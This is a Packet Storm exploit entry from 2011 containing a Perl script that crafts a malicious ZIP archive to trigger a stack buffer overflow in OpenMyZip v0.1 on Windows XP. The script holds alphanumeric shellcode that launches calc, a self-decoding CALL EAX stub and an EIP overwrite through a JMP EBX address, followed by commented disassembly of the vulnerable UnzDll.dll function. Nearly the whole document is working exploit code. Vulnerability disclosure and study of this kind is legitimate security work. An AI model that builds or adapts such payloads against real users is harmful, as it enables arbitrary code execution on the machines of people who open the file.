OpenMyZip 0.1 .ZIP Buffer Overflow

2011-05-02T00:00:00
ID PACKETSTORM:101047
Type packetstorm
Reporter C4SS!0 G0M3S
Modified 2011-05-02T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
#  
#[+]Exploit Title: OpenMyZip V0.1 .ZIP File Buffer Overflow Vulnerability  
#[+]Date: 02\05\2011  
#[+]Author: C4SS!0 G0M3S  
#[+]Software Link: http://download.cnet.com/OpenMyZip/3000-2250_4-10657274.html  
#[+]Version: v0.1  
#[+]Tested On: WIN-XP SP3 Brazil Portuguese  
#[+]CVE: N/A  
#  
#  
#  
  
use strict;  
use warnings;  
  
my $filename = "Exploit.zip";  
  
  
print "\n\n\t\tOpenMyZip V0.1 .ZIP File Buffer Overflow Vulnerability\n";  
print "\t\tCreated by C4SS!0 G0M3S\n";  
print "\t\tE-mail Louredo_\@hotmail.com\n";  
print "\t\tSite www.exploit-br.org/\n\n";  
  
print "\n\n[+] Creting ZIP File...\n";  
sleep(1);  
my $head = "\x50\x4B\x03\x04\x14\x00\x00".  
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .  
"\x00\x00\x00\x00\x00\x00\x00\x00" .  
"\xe4\x0f" .  
"\x00\x00\x00";  
  
my $head2 = "\x50\x4B\x01\x02\x14\x00\x14".  
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".  
"\xe4\x0f".  
"\x00\x00\x00\x00\x00\x00\x01\x00".  
"\x24\x00\x00\x00\x00\x00\x00\x00";  
  
my $head3 = "\x50\x4B\x05\x06\x00\x00\x00".  
"\x00\x01\x00\x01\x00".  
"\x12\x10\x00\x00".  
"\x02\x10\x00\x00".  
"\x00\x00";  
  
my $payload = "\x41" x 8;  
$payload = $payload.  
("\x61" x 7).#6 POPAD  
("\x6A\x30").#PUSH 30  
("\x5B\x52\x59").#POP EBX / PUSH EDX / POP ECX  
("\x41" x 10).#10 INC EAX  
("\x02\xd3").#ADD CL,BL  
("\x51\x58").#PUSH ECX / POP EAX  
("\x98\xd1"); #BASE CONVERSION  
#"\x98" == "\xff"  
# "\xd1" == "\xd0"   
#"\xff" + "\xd0" = CALL EAX AND CODE EXECUTION.;-}  
$payload .= "\x41" x 22;#MORE PADDING FOR START FROM MY SHELLCODE  
$payload .=  
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIYK9PFQO9OO3LUFRPHLN9R".  
"TFDZTNQ5NV8VQSHR8MSM8KLUSRXRHKDMUVPBXOLSUXI48X6FCJUZSODNNCMTBOZ7JP2ULOOU2JMUMPTN".  
"5RFFIWQM7MFSPZURQYZ5V05ZU4TO7SLKK5KEUBKJPQ79MW8KM12FXUK92KX9SZWWK2ZHOPL0O13XSQCO".#Alpha SHELLCODE WinExec('calc',0) BaseAddress = EAX  
"T67JW9HWKLCLNK3EOPWQCE4PQ9103HMZUHFJUYQ3NMHKENJL1S5NHWVJ97MGK9PXYKN0Q51864NVOMUR".  
"9K7OGT86OPYJ03K9GEU3OKXSKYZA";  
$payload .= "\x44" x (2050-length($payload));  
$payload .= "\x58\x78\x39".#POP EAX / JS SHORT 011E0098  
"\x41" x 5;# PADDING FOR OVERWRITE EIP  
$payload .= pack('V',0x00404042);#JMP EBX  
$payload .= "\x42" x 50;  
$payload .= "\x41" x (4064-length($payload));  
  
$payload = $payload.".txt";  
my $zip = $head.$payload.$head2.$payload.$head3;  
open(FILE,">$filename") || die "[-]Error:\n$!\n";  
print FILE $zip;  
close(FILE);  
print "[+] ZIP File Created With Sucess:)\n";  
sleep(2);  
=head  
#  
#The Vulnerable Function:  
#  
#  
#The Vulnerable function is in MODULE UnzDll.dll on  
#Function UnzDllExec+0x7a3 after CALL the function kernel32.lstrcpyA  
#ocorrs the Buffer Overflow on movimentation of the String Very large.  
#  
#Assemble:  
#  
# 0x00DA6A6F 53 PUSH EBX  
# 0x00DA6A70 56 PUSH ESI  
# 0x00DA6A71 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8]  
# 0x00DA6A74 8B55 18 MOV EDX,DWORD PTR SS:[EBP+18]  
# 0x00DA6A77 8B45 10 MOV EAX,DWORD PTR SS:[EBP+10]  
# 0x00DA6A7A 83BE 8CD20000 00 CMP DWORD PTR DS:[ESI+D28C],0  
# 0x00DA6A81 8D9E 50D80000 LEA EBX,DWORD PTR DS:[ESI+D850]  
# 0x00DA6A87 74 65 JE SHORT UnzDll.00DA6AEE  
# 0x00DA6A89 8B8E 84D20000 MOV ECX,DWORD PTR DS:[ESI+D284]  
# 0x00DA6A8F 890B MOV DWORD PTR DS:[EBX],ECX  
# 0x00DA6A91 8B8E 88D20000 MOV ECX,DWORD PTR DS:[ESI+D288]  
# 0x00DA6A97 894B 04 MOV DWORD PTR DS:[EBX+4],ECX  
# 0x00DA6A9A 33C9 XOR ECX,ECX  
# 0x00DA6A9C C743 08 A0000000 MOV DWORD PTR DS:[EBX+8],0A0  
# 0x00DA6AA3 894B 0C MOV DWORD PTR DS:[EBX+C],ECX  
# 0x00DA6AA6 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C]  
# 0x00DA6AA9 894B 10 MOV DWORD PTR DS:[EBX+10],ECX  
# 0x00DA6AAC 81BE 88DB0000 91>CMP DWORD PTR DS:[ESI+DB88],91  
# 0x00DA6AB6 7F 0A JG SHORT UnzDll.00DA6AC2  
# 0x00DA6AB8 8BC8 MOV ECX,EAX  
# 0x00DA6ABA 80E1 FF AND CL,0FF  
# 0x00DA6ABD 0FBEC9 MOVSX ECX,CL  
# 0x00DA6AC0 EB 02 JMP SHORT UnzDll.00DA6AC4  
# 0x00DA6AC2 8BC8 MOV ECX,EAX  
# 0x00DA6AC4 894B 14 MOV DWORD PTR DS:[EBX+14],ECX  
# 0x00DA6AC7 85D2 TEST EDX,EDX  
# 0x00DA6AC9 8B45 14 MOV EAX,DWORD PTR SS:[EBP+14]  
# 0x00DA6ACC 8943 18 MOV DWORD PTR DS:[EBX+18],EAX  
# 0x00DA6ACF 75 06 JNZ SHORT UnzDll.00DA6AD7  
# 0x00DA6AD1 C643 1C 00 MOV BYTE PTR DS:[EBX+1C],0  
# 0x00DA6AD5 EB 0A JMP SHORT UnzDll.00DA6AE1  
# 0x00DA6AD7 52 PUSH EDX  
# 0x00DA6AD8 8D53 1C LEA EDX,DWORD PTR DS:[EBX+1C]  
# 0x00DA6ADB 52 PUSH EDX  
# 0x00DA6ADC E8 ABF20000 CALL UnzDll.00DB5D8C ; JMP to kernel32.lstrcpyA  
# 0x00DA6AE1 53 PUSH EBX  
# 0x00DA6AE2 FF96 8CD20000 CALL DWORD PTR DS:[ESI+D28C] ; Here ocorrs the Code Execution:-)  
# 0x00DA6AE8 0986 70D20000 OR DWORD PTR DS:[ESI+D270],EAX  
# 0x00DA6AEE 5E POP ESI  
# 0x00DA6AEF 5B POP EBX  
# 0x00DA6AF0 5D POP EBP  
# 0x00DA6AF1 C3 RETN  
#  
#  
#  
#  
#  
=cut  
  
`